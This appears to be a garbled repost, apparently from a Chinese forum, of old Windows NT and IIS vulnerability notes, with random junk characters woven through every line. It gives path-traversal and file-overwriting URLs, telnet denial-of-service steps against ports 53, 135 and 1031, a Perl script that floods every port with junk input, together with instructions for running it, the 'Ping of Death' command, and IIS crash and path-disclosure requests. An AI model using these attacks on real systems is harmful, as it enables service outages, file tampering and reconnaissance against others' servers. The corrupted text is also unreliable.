受影響系統(tǒng):4.0,iis 1.0
8 S( W9 c# R9 w) h, k" SA URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.
$ e0 n1 w( g! e
( B5 E( v) x( z: DA URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.
/ c3 [: F* `1 h, N( y/ R1 L1 D1 j7 _; u0 v
By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.
0 C3 l6 C( l* n" g) p
! K" M: c9 b. X, i$ I8 K; m--------------------------------------------------------------------% _: p. ^- x% E, }: J
. V9 Z" i) }" {
受影響系統(tǒng):4.0* q* c4 [5 g; v% w
A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.
; H# j7 _; W4 H& n8 e7 O9 A+ d+ x. H# O/ a
If the file 'target.bat' exists, the file will be truncated./ Q6 s% S6 v6 q$ ]
. ^& @$ Q. [& z8 D) S( K
$ b3 H0 G0 M# v6 L7 o/ aA URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.
( f' p3 t9 T. s5 _ J0 _
: S" z; @; [6 ?/ k----------------------------------------------------------------------
* \' Y4 |8 @. M
; M3 ?' F7 P( C/ U- K% _受影響系統(tǒng):3.51,4.03 }8 p+ K6 c$ j; w! P+ U M
Multiple service ports (53, 135, 1031) are vunerable to 'confusion'.
; Z) w4 M; v* |3 n$ f& f' ^7 A! ~9 z u
The following steps;; U- }& A* b& u9 l! m
, L# d9 P6 i. [1 s8 R8 xTelnet to an NT 4.0 system on port 135 " l8 K+ P' k: J) S- m. H$ N0 l
Type about 10 characters followed by a <CR> 0 J7 g( ~1 P, P3 D3 O9 g1 u
Exit Telnet * n c; Y5 m; `# F- x& a- @% y
results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.
8 }! k' A3 x( c
) @! ?! Q: E$ p) K( Y2 o# c; Z1 eWhen launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.
; ]7 Q& k( T' l2 q2 y2 u1 W, v$ {! W% ]' ]/ ~" b2 I; L
The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted., f v8 Z: k% y! w
# G( F6 M) d0 E4 H$ R: j
If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.
( y; k3 h2 c, H6 }1 Z g
^8 X9 x: c* @0 ZThe following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):5 M! a: S# a/ q5 Z3 D
6 \9 I9 |. h/ K' U e5 e/*begin poke code*/
( }1 N4 S2 f/ L- u; D4 W ~, ~. n. k: T' r, d
use Socket;& C% Y- c1 B9 O% e% _ ~* R
use FileHandle;& R% ?2 s( ^4 Z- O: U# X ^
require "chat2.pl";% U: ^# J, n! |. H W
" Y/ l1 C: C- p$ L% d! _
$systemname = $ARGV[0] && shift;. U2 {/ i; _( ?
* d# J; H& V8 O4 I; r$verbose = 1; # tell me what you're hitting
M+ S6 w7 S- e7 G$knownports = 1; # don't hit known problem ports; q/ [" P7 S6 f$ K# v" X* q
for ($port = $0; $port<65535; $port++) ) P# v. J9 z- D. g1 B/ t( Q
{. Y* J- Y: n2 y+ X) M
; I. C! z7 d! h6 `
+ v4 O- V Q2 l" C8 `if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {
. E! v, \0 G8 n0 k/ z6 C7 cnext;2 d# k/ N9 \; {. X
}
! S4 _( w, t3 D' r7 s& g L8 m5 }: G$fh = chat::open_port($systemname, $port);; M& e, A& ?( p/ F/ O
chat::print ($fh,"This is about ten characters or more");$ W2 G/ I. k1 I$ i" N
if ($verbose) {( ?' ?. P5 q) A, l! g, C
print "Trying port: $port\n";
) m! j! I @8 R$ i}
- C2 v0 P6 c1 }; Ychat::close($fh);
6 U T" m! n. Q: Q E2 N: r* E* @' x- Z% S
}9 A0 _# [! C9 [5 I2 H0 T
0 n) l5 d) e) R; d/ D* P( X" k
: p- e% N/ A2 b8 A2 _/ `
/*end poke code*/. N" e& G% I6 [7 E, x! { K# V8 o
! p' a; O0 H! u/ |; eSave the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername
/ `1 w/ J2 ^$ U
* ~7 [( I# Y3 F4 W# r g1 [% l9 b3 g( P--------------------------------------------------------------------------------
) {8 d' P% k: T0 e l6 x/ V+ b
4 R0 J& X; ?- h- N8 N: p2 u+ B受影響系統(tǒng):4.0
# X' H0 B; k) h6 t7 G3 @: ZUsing a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.
' P2 j& e x! M- W) W, `# K9 ]2 s8 Q2 r$ c: Z' K! [- I' H
This attack causes Dr. Watson to display an alert window and to log an error:
, @. G1 G, h; ]! ^* n% B! I& ^! I0 v- w' E% I5 }. P' |
"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"
! C, Z1 C" _) q/ X3 w
; e/ c1 b0 ]- Z3 C) i4 T! C--------------------------------------------------------------------------------
0 c {/ ~- ?8 l0 f! X) T9 b- A9 a
& c/ A6 ]" N0 i- L受影響系統(tǒng):3.51,4.0
5 Z2 W+ x Q; h, n LLarge packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:
, @# k; v( ?% F/ L6 j, t9 m3 T6 N* c+ V
STOP: 0X0000001E
+ @9 k2 N8 f- N* M5 l. I: FKMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS. I" O- e3 j4 Q+ f V
8 p, A' E: q9 E9 @9 j8 Y& ]' P B1 I
-OR-0 Z7 D* i1 U- l) [6 W- b' j6 o! b
# p% A, @6 g& \0 q. i- a: C, dSTOP: 0x0000000A4 A% {- Q9 i1 [3 A1 l* W
IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS: h' [2 W" ?4 f, l# G+ i1 ^$ B
" S8 G) k6 ~4 ?" J, \
NT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.
1 z- g- a8 _/ A) i$ }
; `7 ^% z7 g/ {$ f" s--------------------------------------------------------------------------------3 I2 g+ V$ P. X. q- {" T
( k! s, [6 Y: p: eMicrosoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure). & e, C5 S# F" o) ^+ C# K. m! r
/ ]. |! z v/ f: J1 F7 J
--------------------------------------------------------
2 Y3 n2 D b- F) W/ ^. _$ I! Z* b$ Z1 Q# c4 G
IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server |